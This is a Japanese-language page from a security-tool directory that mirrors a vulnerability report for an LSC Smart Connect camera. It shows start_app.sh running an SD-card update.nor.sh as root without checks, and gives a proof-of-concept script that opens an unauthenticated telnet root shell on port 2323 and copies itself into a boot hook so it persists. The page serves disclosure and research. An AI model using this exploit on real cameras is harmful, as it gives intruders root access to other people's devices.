Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-65817 — こちらがCVE-2025-65817です | Kitploit
ツール/GitHubGitHub/istaarkk/cve-2025-65817
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトハードウェアとIoTセキュリティリモートアクセスツール
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

こちらがCVE-2025-65817です

リポジトリを見る
98ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-65817


フィールド値
タイトル脆弱性レポート: LSCスマートコネクトカメラ
日付2024-02-15
説明SDカードの更新フックを悪用して、LSCスマートコネクトカメラ上でリモートシェルを起動する。
タグiot, vulnerability, cve
ファームウェア1.14.13

LSCスマートコネクトカメラの脆弱性レポート

発見された脆弱性は、start_app.sh の更新システムを悪用するものであり、より正確にはSDカードのマウントと update.nor.sh ファイルを介して悪用されます。

設定変数

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

local/sbin/start_app.sh:50–99 のセクションは、SDカード上にある update.nor.sh という名前のファイルを盲目的に信頼します。起動プロセス中、スクリプトは:

  • SDカードをマウントし、
  • update.nor.sh を /tmp/update.nor.sh にコピーし、
  • その内容、整合性、権限、所有権を一切検証しません。

起動シーケンスの後半(local/sbin/start_app.sh:108–129)では、コピーされたファイルは:

  • 実行可能としてマークされ、
  • rootとして実行され、
  • SDカードのマウントポイントを引数として渡されて実行されます。

この実行はメインの ipc_service が開始する前に行われるため、スクリプトはネットワークユーティリティ、ウォッチドッグ機能、アップグレードヘルパーがすでに利用可能な最高権限環境で実行されます。

利用可能なユーティリティ

このエクスプロイトは、カメラに存在するtelnetdを介してシェルを作成し、ポートを開くというものです:

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

概念実証(PoC)

SDカードに .sh スクリプトを書き込み、update.nor.sh という名前を付けるだけです。

私が選択したエクスプロイトは次のとおりです:

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

ポートが開いていることを確認します。

alt text

telnetで接続します:

alt text

ツールをダウンロード